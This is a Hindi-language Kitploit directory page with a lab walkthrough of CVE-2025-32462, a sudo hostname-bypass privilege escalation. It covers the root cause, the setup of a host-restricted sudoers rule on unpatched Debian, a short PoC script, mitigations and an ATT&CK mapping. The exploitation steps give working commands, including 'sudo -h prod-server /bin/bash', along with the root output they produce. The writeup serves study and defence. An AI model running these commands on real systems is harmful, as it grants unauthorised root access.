Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32462- — CVE-2025-32462 is a local privilege escalation vulnerability in sudo | Kitploit
उपकरण/GitHubGitHub/offsecplaybook/cve-2025-32462-
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationLabs & Practice
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 is a local privilege escalation vulnerability in sudo

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32462 – Sudo होस्टनाम बायपास विशेषाधिकार वृद्धि

CVE Cyber Security Penetration Testing Security Research

विषय-सूची

  1. अवलोकन
  2. भेद्यता विवरण
  3. प्रभाव
  4. प्रयोगशाला वातावरण
  5. भेद्य संस्करण की पुष्टि
  6. उपयोगकर्ता और sudoers कॉन्फ़िगरेशन
  7. शोषण चरण-दर-चरण
  8. प्रूफ ऑफ कॉन्सेप्ट सारांश
  9. उबंटू क्यों भेद्य नहीं है
  10. शमन
  11. MITRE ATT&CK मैपिंग
  12. संदर्भ
  13. अस्वीकरण

अवलोकन

CVE-2025-32462 sudo में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है जो कम विशेषाधिकार वाले उपयोगकर्ता को होस्टनाम-प्रतिबंधित sudo नियमों का दुरुपयोग करके रूट के रूप में कमांड निष्पादित करने की अनुमति देती है। समस्या इस बात में निहित है कि sudo ने ऐतिहासिक रूप से प्राधिकरण जाँच के दौरान -h (होस्ट) विकल्प को कैसे संभाला।

जब कोई sudoers नियम किसी विशिष्ट होस्टनाम तक सीमित होता है, तो sudo को केवल तभी निष्पादन की अनुमति देनी चाहिए जब सिस्टम होस्टनाम नियम से मेल खाता हो। त्रुटिपूर्ण तर्क के कारण, प्रभावित संस्करणों ने sudo -h के माध्यम से उपयोगकर्ता-द्वारा आपूर्ति किए गए होस्टनाम पर भरोसा किया, जिससे हमलावर प्रतिबंध को पूरी तरह से बायपास कर सकते हैं।


भेद्यता विवरण

  • CVE आईडी: CVE-2025-32462
  • प्रकार: स्थानीय विशेषाधिकार वृद्धि
  • प्रभावित घटक: sudo
  • हमला वेक्टर: स्थानीय
  • आवश्यक विशेषाधिकार: निम्न (गैर-sudo उपयोगकर्ता)
  • उपयोगकर्ता सहभागिता: कोई नहीं

मूल कारण

sudo ने -h <hostname> तर्क को प्राधिकरण निर्णयों को प्रभावित करने की अनुमति दी। भेद्य संस्करणों में, sudoers नियम मूल्यांकन के दौरान आपूर्ति किए गए होस्टनाम पर भरोसा किया गया, सिस्टम के वास्तविक होस्टनाम के विरुद्ध सख्ती से मान्य करने के बजाय।

परिणामस्वरूप, होस्ट-आधारित sudo प्रतिबंधों को बायपास किया जा सकता है।


प्रभाव

यदि सफलतापूर्वक शोषण किया जाता है, तो एक स्थानीय हमलावर यह कर सकता है:

  • रूट के रूप में मनमाने कमांड निष्पादित करना
  • सिस्टम को पूरी तरह से समझौता करना
  • प्रशासनिक सुरक्षा सीमाओं को बायपास करना

वास्तविक दुनिया के वातावरण में, यह भेद्यता विशेष रूप से खतरनाक है:

  • बहु-उपयोगकर्ता सिस्टम
  • होस्ट-विशिष्ट sudo नियमों का उपयोग करने वाले कठोर वातावरण
  • बास्टियन या जंप होस्ट

प्रयोगशाला वातावरण

घटकविवरण
OSडेबियन 11 (बुल्सआई – अनपैच्ड)
sudo संस्करण≤ 1.9.13
पहुंच स्तरस्थानीय उपयोगकर्ता
वर्चुअलाइज़ेशनVirtualBox

⚠️ नोट: आधुनिक Ubuntu और डेबियन रिलीज़ में समान संस्करण स्ट्रिंग बनाए रखते हुए बैकपोर्टेड पैच हैं। यह भेद्यता पैच किए गए सिस्टम पर पुनरुत्पादित नहीं की जा सकती।


चरण 1 – भेद्य sudo संस्करण सत्यापित करें

root@kitploit:~
sudo --version

अपेक्षित (भेद्य):

root@kitploit:~
Sudo version 1.9.5p2

चरण 2 – निम्न-विशेषाधिकार उपयोगकर्ता बनाएँ

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

अपेक्षित:

root@kitploit:~
attacker : attacker

उपयोगकर्ता sudo समूह से संबंधित नहीं होना चाहिए।


चरण 3 – भेद्य sudoers नियम कॉन्फ़िगर करें

सुरक्षित रूप से sudoers संपादित करें:

root@kitploit:~
sudo visudo

निम्नलिखित पंक्ति जोड़ें:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server एक नकली होस्टनाम है
  • वास्तविक सिस्टम होस्टनाम अलग होना चाहिए

सत्यापित करें:

root@kitploit:~
sudo -l -U attacker

अपेक्षित:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

चरण 4 – सामान्य sudo को अस्वीकृत होने की पुष्टि करें

उपयोगकर्ता स्विच करें:

root@kitploit:~
su - attacker

सामान्य रूप से sudo का प्रयास करें:

root@kitploit:~
sudo id

अपेक्षित:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

चरण 5 – शोषण (CVE-2025-32462)

भेद्यता को ट्रिगर करें:

root@kitploit:~
sudo -h prod-server id

सफल शोषण आउटपुट:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

रूट शेल प्राप्त करें:

root@kitploit:~
sudo -h prod-server /bin/bash

सत्यापित करें:

root@kitploit:~
id

प्रूफ ऑफ कॉन्सेप्ट सारांश

स्वचालित PoC स्क्रिप्ट (वैकल्पिक)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

exploit.sh के रूप में सहेजें, निष्पादन योग्य बनाएँ, और attacker उपयोगकर्ता के रूप में चलाएँ:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
क्रियापरिणाम
सामान्य sudo❌ अस्वीकृत
sudo -h prod-server id✅ रूट

यह एक सफल विशेषाधिकार वृद्धि की पुष्टि करता है।


उबंटू क्यों भेद्य नहीं है

आधुनिक Ubuntu रिलीज़ sudo संस्करणों के साथ आती हैं जो प्रभावित सीमा के अंतर्गत आते हैं। हालाँकि, Ubuntu ने ऊपरी-प्रवाह संस्करण स्ट्रिंग को बदले बिना CVE-2025-32462 के लिए सुरक्षा फिक्स को बैकपोर्ट किया है।

परिणामस्वरूप:

  • sudo -h विकल्प अब प्राधिकरण जाँच को प्रभावित नहीं करता
  • होस्टनाम स्पूफिंग को सही ढंग से अस्वीकार कर दिया गया है
  • समान संस्करण संख्याओं के बावजूद भेद्यता को पुनरुत्पादित नहीं किया जा सकता

यह केवल संस्करण स्ट्रिंग के बजाय व्यवहारिक परीक्षण का उपयोग करके भेद्यता स्थिति को मान्य करने के महत्व को उजागर करता है।


शमन

  • sudo को पैच किए गए संस्करण में अपग्रेड करें
  • जहाँ संभव हो होस्ट-प्रतिबंधित sudo नियमों को हटाएँ
  • स्थानीय विशेषाधिकार वृद्धि प्रयासों की निगरानी करें

MITRE ATT&CK मैपिंग

  • TA0004 – विशेषाधिकार वृद्धि
  • T1548.003 – एलिवेशन कंट्रोल मैकेनिज्म का दुरुपयोग (sudo)

संदर्भ

  • CVE-2025-32462 सलाहकार
  • sudo प्रोजेक्ट सुरक्षा घोषणाएँ
  • डेबियन सुरक्षा ट्रैकर

अस्वीकरण

यह वॉकथ्रू केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए है। इस भेद्यता का उन सिस्टमों पर परीक्षण न करें जिनके आप स्वामी नहीं हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें